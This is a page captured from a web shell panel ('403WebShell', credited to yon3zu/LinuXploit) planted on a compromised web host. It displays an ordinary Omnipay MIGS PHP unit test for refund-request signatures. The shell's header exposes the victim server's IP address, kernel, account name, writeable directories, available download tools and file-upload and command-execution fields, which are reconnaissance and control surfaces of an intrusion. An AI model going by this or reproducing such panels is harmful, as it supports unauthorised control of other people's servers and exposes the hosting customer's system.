Failed to save the file to the "xx" directory.

Failed to save the file to the "ll" directory.

Failed to save the file to the "mm" directory.

Failed to save the file to the "wp" directory.

403WebShell
403Webshell
Server IP : 66.29.132.124  /  Your IP : 18.226.187.232
Web Server : LiteSpeed
System : Linux business141.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
User : wavevlvu ( 1524)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/wavevlvu/book24.ng/vendor/omnipay/migs/tests/Message/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/wavevlvu/book24.ng/vendor/omnipay/migs/tests/Message/ThreePartyRefundRequestTest.php
<?php

namespace Omnipay\Migs\Message;

use Omnipay\Tests\TestCase;

class ThreePartyRefundRequestTest extends TestCase
{
    public function setUp()
    {
        $this->request = new ThreePartyRefundRequest($this->getHttpClient(), $this->getHttpRequest());
    }

    public function testSignature()
    {
        $this->request->initialize(
            array(
                'amount'             => '12.00',
                'transactionId'      => 123,

                'merchantId'         => '123',
                'merchantAccessCode' => '123',
                'secureHash'         => '123',

                'transactionNo' => '1112',

                'user' => 'amauser',
                'password' => 'amapassword'
            )
        );

        $data = $this->request->getData();

        $this->assertSame('80E8AD6C582431F9C8A55C9645EE2F05BA70D178EB0A85E7394331DC09B61875', $data['vpc_SecureHash']);
    }

    /**
     * @depends testSignature
     */
    public function testRefund()
    {
        $httpResponse = $this->getMockHttpResponse('ThreePartyRefundFailure.txt');
        $response = new Response($this->getMockRequest(), $httpResponse->getBody());
        $this->assertInstanceOf('Omnipay\Migs\Message\Response', $response);
        $this->assertFalse($response->isSuccessful());
        $this->assertFalse($response->isRedirect());
        $this->assertSame('7', $response->getCode());
        $this->assertSame(
            'E5000: Merchant [123] does not have the required privilege to use the VirtualPaymentClient API.',
            $response->getMessage()
        );
    }
}

Youez - 2016 - github.com/yon3zu
LinuXploit